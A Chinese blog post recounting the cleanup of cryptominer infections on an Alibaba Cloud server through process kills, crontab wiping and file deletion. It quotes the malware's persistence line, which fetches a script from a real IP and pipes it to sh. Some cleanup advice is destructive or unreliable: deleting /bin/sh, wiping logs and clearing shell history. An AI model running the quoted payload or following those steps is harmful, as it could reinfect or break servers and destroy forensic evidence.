您当前的位置:首页 > 计算机 > 安全防护

服务器被挖矿程序占用解决过程

时间:08-23来源:作者:点击数:

公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图)

这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是中了挖矿的马。(啊,我的天。这只是一个单核1G内存的阿里云主机)既然被***了,那就得干掉它,下面是解决过程:

1:第一步要先找到这个wnTKYg文件实体,对了还有一个叫ddg.2020的进程。

[root@alitest ~]$ find / -name wnTKYg
/tmp/wnTKYg
[root@alitest ~]$ find / -name ddg*
/tmp/ddg.2020

2:接着把这两个文件的可执行权限拿掉。

[root@alitest ~]$ cd /tmp
[root@alitest /tmp]$ chmod -x ddg.2020 wnTKYg

3:杀掉这该死的进程。

[root@alitest /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -9

4:清除无用的定时任务。

[root@alitest /tmp]$ crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

这是挖矿程序生成的定时任务,不清除掉待会进程又起来了。

[root@alitest /tmp]$ echo > /var/spool/cron/root

因为这台机器上没有做定时任务,所以就直接清除掉了,如果有其他在用的定时任务,不要这样哦。

5:删除挖矿程序。

[root@alitest /tmp]$ rm -f ddg.2020 wnTKYg

6:清除.ssh/下的公钥文件。

[root@alitest ~/.ssh]$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV
.................

这台机器并没有上传过公钥文件,所以这就是***者留下的咯,删掉删掉。

[root@alitest ~/.ssh]$ rm -f authorized_keys

至此,***就已经清理完毕了。

小结:

在网上查了一下,发现大部分挖矿都发生在redis上,而我这台服务器并没有部署redis,而是当时厂家给装的一套voip环境,因此我怀疑是voip软件的漏洞导致了此次事件,之后再联系厂家看看。通过这次服务器被的案例,再一次印证了安全的重要性,安全无小事,继续努力吧。

继上面的挖矿木马解决后,但是之后在收到阿里云的态势感知的通知又有挖矿病毒了,于是解决。。。

阿里云态势感知通知 检测到服务器有异常文件下载,当时没太注意,执行下面操作解决问题(简单针对于minerd处理)

1、执行 top -i命令查看cpu 使用总过高,使用top -l 查看到是minerd作祟

image
image

2、果断ps -ef | grep ‘minerd’ 查看pid

3、使用kill -9  程序的pid 杀死掉

4、到 cd  /tmp/下查看是否存有临时文件,如果有rm -rf 删除,没有就算了

5、crontab -l 查看是否有定时,有的话到cd /etc/crontab  查看是否有陌生的定时任务,如果有也是直接删除

6、然后top 再查看,成功了,然后查阅了资料,说redis 漏洞,果断修改了ssh密码,修改redis的端口,修改了登录数据库密码,一切看起来就是这么简单

image

xx.xx.xxx.xx(ixxxxx…)出现了可疑安全事件:Linux异常文件下载 ,建议您立即登录云盾-态势感知控制台查看详情和处理。

image
image

于是登录服务器查看。我嘞靠,输入一条命令ls 反应比乌龟还慢,然后每条命令反应都在3秒才能出结果,我可受不了,于是从花了一天时间才解决掉,看下面,

1、命令 top 查看,我去,满满的cpu,但是怎么看不到那个进程占用了CPU呢

image

2、于是又 使用crontab -l 查看,赤裸裸定时任务,这又是什么鬼,矿机不是解决了吗?这那来的任务

image

清除无用的定时任务。

这是挖矿程序生成的定时任务,不清除掉待会进程又起来了。

[root@alitest /tmp]$ echo > /var/spool/cron/root
[root@alitest /tmp]$ echo > /var/spool/cron/crontabs/root
[root@alitest /tmp]$ echo > /etc/cron.d/root

因为这台机器上没有做定时任务,所以就直接清除掉了,如果有其他在用的定时任务,不要这样哦。

4、cd /tmp/ 下,三个莫名其妙出现的文件,果断 rm -rf 文件名删除

image

注意:在/tmp/下有一个文件名字是 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>

删除这个文件的时候报错:-bash: syntax error near unexpected token `(’

百度之后要这样删除 rm -rf Aegis-\<Guid5A2C30A2−A87D−490A−9281−6765EDAD7CBA\>

在每个括号前面加上,因为在linux5.0之后,是不能带有括号的,这个时候就需要转译了

5、ls -al 看下,果然还有隐藏文件,通通删除

image

6、去cd /etc/crontab ,删除定时任务,然后top -i,得到如下,cup依然张立在哪里,懵逼

image

7、top -b 多了一个python,干啥的不知道,查看删除进程python

image
image

8、最后去查看日志,如下顺着这个日志一步一步走下去

image

9、cd  /etc,下rm -rf ld.so.preload

image

10、cd /usr/local/lib下 rm -rf libjdk.so

image

11、再去cd /etc/crontab ,查看有没有定时任务,有删除

12、去cd /tmp下,有也统统删除

13、top -b 居然有3个资源kworkerrds占据cpu 33%,终于找到你,尼玛,还好没放弃,由于当时找到目标,太过激动没截图,因为已经下午5点了,花了大量时间找原因,看日志,查资料

14、于是果断ps -ef | grep kworkerds,赤裸裸就是你

image

15、kill -9 pid ,history -c清除记录(下面解释)

image

16,top ,终于下来了,心累呀

image

17、之前花了大量时间查看原因,原来是黑客通过在我日志里面留下了程序,我之前清除了minerd,然后又通过日志里面的程序进行了一个脚本任务,通过这个脚本获取操作记录,(为什么history -c清除记录),然后再次侵入我的服务器,现在是21:00,心累

18、对了,还有如下操作,这才完美收官。cd /var/log

image

19、可疑的日志通通删除

image

20、记得修改所有密码,记得history -c

上面的方法如果没有效果可以结合下面的方法一起使用

A:先把定时任务删除掉

rm -rf /etc/cron.d/root
rm -rf /var/spool/cron/crontabs
rm -rf /bin/sh /var/spool/cron/root

B:删掉重启系统后执行脚本

rm -rf /bin/httpdns

C:删掉挖矿执行脚本

rm -rf /tmp/kworkerds

D: 删除修top显示命令的脚本 (导致top查询不处理此挖矿进程)

rm -rf /usr/local/lib/libntp.so

E:删除python执行文件

rm -rf /tmp/.tmpa

F: 再用Top命令,就可以找出此耗cpu进程

J:kill 掉此进程

K:修改redis 密码,最好修改bind 为127.0.0.1

方便获取更多学习、工作、生活信息请关注本站微信公众号城东书院 微信服务号城东书院 微信订阅号
推荐内容
相关内容
栏目更新
栏目热门
本栏推荐